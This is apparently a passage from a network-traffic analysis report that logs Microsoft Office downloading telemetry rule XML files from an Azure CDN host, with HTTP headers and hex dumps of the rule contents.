                                                                                                        2024-12-09 12:49:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        39192.168.2.84976313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:46 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:47 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:47 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 423
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                        x-ms-request-id: 2f0750f4-201e-0000-61a2-49a537000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124947Z-r1cf579d7786c2tshC1EWRr1gc000000084g000000000aha
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:47 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        40192.168.2.84976513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:47 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:47 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:47 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 404
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                        x-ms-request-id: e267231f-301e-0099-3103-486683000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124947Z-r1cf579d778qlpkrhC1EWRpfc800000009200000000054bx
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:47 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        41192.168.2.84976713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:47 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:47 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:47 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 400
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                        x-ms-request-id: 45d7ff1d-301e-0033-4715-4afa9c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124947Z-r1cf579d778n9656hC1EWRqns000000000s000000000377u
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:47 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        42192.168.2.84976413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:47 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:48 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:47 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 478
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                        x-ms-request-id: 00885abd-f01e-001f-4d2e-495dc8000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124947Z-r1cf579d778n9656hC1EWRqns000000000r000000000468v
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:48 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        43192.168.2.84976613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:47 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:48 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:47 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 468
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                        x-ms-request-id: 6d6f58af-101e-0028-33a4-498f64000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124947Z-r1cf579d778469knhC1EWR2gqc000000015g000000004h6r
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:48 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        44192.168.2.84976813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:49 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:50 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 479
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                        x-ms-request-id: 30883f21-801e-00a0-1802-482196000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124950Z-r1cf579d7789trgthC1EWRkkfc00000009200000000050mq
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:50 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        45192.168.2.84976913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:49 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:50 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 425
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                        x-ms-request-id: c9f0d292-501e-0047-460d-49ce6c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124950Z-r1cf579d7789trgthC1EWRkkfc00000009500000000019gq
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:50 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        46192.168.2.84977013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:49 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:50 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 475
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                        x-ms-request-id: 2968f52d-d01e-002b-1502-4825fb000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124950Z-r1cf579d778lntp7hC1EWR9gg400000007tg000000006c9h
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:50 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        47192.168.2.84977213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:50 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:50 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 491
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                        x-ms-request-id: 7ea70f1c-301e-005d-1d26-49e448000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124950Z-r1cf579d778w7n65hC1EWR9b6800000000v0000000005f1p
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:50 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        48192.168.2.84977113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:50 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:50 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 448
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                        x-ms-request-id: f8799778-401e-0064-72cc-4954af000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124950Z-r1cf579d778l2x6lhC1EWRsptc00000001eg0000000003z7
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:50 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        49192.168.2.84977413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:51 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
